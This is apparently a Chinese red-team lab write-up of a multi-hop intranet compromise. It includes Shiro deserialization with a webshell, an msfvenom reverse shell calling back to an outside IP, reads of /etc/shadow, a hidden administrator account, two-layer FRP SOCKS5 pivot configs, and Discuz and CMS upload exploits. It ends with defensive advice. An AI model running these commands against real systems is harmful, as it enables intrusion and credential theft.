红队攻防渗透——通过二层代理拿下内网服务器
字数 1348 2025-08-11 21:26:29
红队攻防渗透:通过二层代理拿下内网服务器
1. 信息收集阶段
1.1 工具选择与使用
- 御剑扫描:效果不佳,未扫描出有用信息
- 7kb扫描:效果一般,未发现关键信息
- 端口扫描:发现关键端口
- 22端口:SSH服务,尝试弱口令爆破未果
- 80端口:Web服务
- 8086端口:未深入利用
1.2 目录爆破
- 推荐使用Kali Linux中的
dirb工具 - 将扫描结果导入Ehole3.0-linux进行批量指纹识别
- 命令:
./Ehole3.0-linux -l url.txt
- 命令:
- 发现关键路径:
http://xxx.x.xx.x:38080/sh/,识别为Shiro框架
2. 漏洞利用
2.1 Shiro反序列化攻击
- 使用Shiro反序列化回显工具
- 直接写入冰蝎(Behinder)的Webshell并连接
- 成功获取Linux主机shell
2.2 内网信息收集
- 执行基本系统检查命令:
ifconfig # 查看网络配置 cat /etc/passwd # 查看用户列表 cat /etc/shadow # 查看密码哈希 hostname # 查看主机名 whoami # 查看当前权限 - 确认已获取root权限
3. 内网横向移动
3.1 MSF联动
- 生成木马:
msfvenom -p windows/meterpreter/reverse_tcp lhost=43.138.57.125 lport=5555 -f exe -o /tmp/wangkun.elf - 使用杀软识别网站:https://i.hacking8.com/tiquan/
- 在服务器上设置监听
- 通过冰蝎配置并连接
3.2 FRP代理搭建
一层代理配置
服务器端配置(frps.ini):
[common]
bind_port = 4000
运行命令:./frps -c frpc.ini
受害主机配置:
- 上传FRP工具
- 赋予权限:
chmod +x frpc frpc.ini frpc_full.ini LICENSE - 启动客户端:
./frpc -c ./frpc.ini
发现内网服务
- 发现192.168.2.242上的80端口运行Discuz
- 使用火狐配置代理访问
3.3 Discuz漏洞利用
- 利用CNVD-2019-22239漏洞
- 工具来源:https://github.com/theLSA/discuz-ml-rce
- 使用蚁剑配置代理连接Webshell
- 提权操作:
net user mysql$ envl /add # 添加用户 net localgroup administrators mysql$ /add # 添加到管理员组
3.4 内网进一步发现
- 使用fscan进行内网扫描:
fscan.exe -h 192.168.3.0/24 > 111.txt - 发现新网段192.168.3.0/24
4. 二层代理搭建
4.1 服务器配置(frps_vps.ini)
[common]
bind_port = 7000
运行:./frps -c frps_vps.ini
4.2 内网第一跳主机(192.168.2.151)配置(frpc_11.ini)
[common]
server_addr = 43.138.57.125
server_port = [socks5_to_2]
type = tcp
remote_port = 10088
plugin = socks5
[socks5_to_3]
type = tcp
local_ip = 127.0.0.1
local_port = 10089
remote_port = 10090
运行:./frpc -c frpc_11.ini
4.3 内网第二跳主机(192.168.2.190)配置(frpc_2.ini)
[common]
server_addr = 192.168.2.151
server_port = 7000
[socks5_2]
type = tcp
plugin = socks5
remote_port = 10089
运行:./frpc -c frpc_2.ini
5. 最终目标攻击
5.1 狮子鱼CMS攻击
- 发现192.168.3.180:80运行狮子鱼CMS
- 利用任意文件上传漏洞获取shell
- 访问上传的Webshell:
http://192.168.3.180/Common/image/uploads/1656091711618.php - 密码:wkk
- 获取最终flag
6. 技术要点总结
- 信息收集:多工具组合使用,dirb+Ehole效果最佳
- 漏洞利用:
- Shiro反序列化
- Discuz历史漏洞(CNVD-2019-22239)
- 狮子鱼CMS任意文件上传
- 代理技术:
- FRP一层代理穿透
- FRP二层代理深入内网
- 工具组合:
- 冰蝎+MSF联动
- 蚁剑代理配置
- fscan内网扫描
7. 防御建议
- 及时更新框架和CMS系统
- 限制不必要的端口暴露
- 加强内网隔离
- 监控异常代理行为
- 实施严格的权限管理
注:本文所述技术仅用于学习教育目的,非法使用后果自负。